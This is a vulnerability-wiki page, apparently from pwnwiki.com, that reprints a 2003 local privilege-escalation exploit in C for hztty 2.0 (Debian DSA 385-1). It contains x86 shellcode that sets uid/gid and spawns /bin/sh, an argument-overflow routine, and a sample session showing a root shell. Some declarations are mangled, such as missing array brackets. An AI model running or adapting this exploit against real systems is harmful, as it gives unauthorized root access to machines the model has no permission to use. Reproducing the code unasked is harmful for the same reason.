免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
EXP
/* 0x333hztty => hztty 2.0 local root exploit * * * more info : Debian Security Advisory DSA 385-1 * * *note* I adjusted some part of hztty's code since * there were some errors. hope this will not influence * exploitation :> tested against Red Hat 9.0 : * * email protected c0wboy$ gcc 0x333hztty.c -o k * email protected c0wboy$ ./k * * --- local root exploit for hztty 2.0 --- * --- coded by c0wboy ~ 0x33 --- * * sh-2.05b# ./hztty started using /dev/ttyp6 * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy) * sh-2.05b# * * coded by c0wboy * * (c) 0x333 Outsiders Security Labs * */ #include <stdio.h> #include <unistd.h> #define BIN "./hztty" #define SIZE 272 unsigned char shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8" "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" "\xd2\xb0\x0b\xcd\x80" ; int main() { int i; char outSIZE; char *own = { shellcode, 0x0 }; int *hztty = (int *)(out); int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode); for (i=0 ; i<SIZE-1 ; i+=4) *hztty++ = ret; hztty = 0x0; fprintf (stdout, "\n --- local root exploit for hztty 2.0 ---\n"); fprintf (stdout, " --- coded by c0wboy ~ www.0x333.org ---\n\n"); execle (BIN, BIN, "-I", out, 0x0, own, 0x0); } // milw0rm.com 2003-09-21
免费、自由、人人可编辑的漏洞库--PwnWiki.com
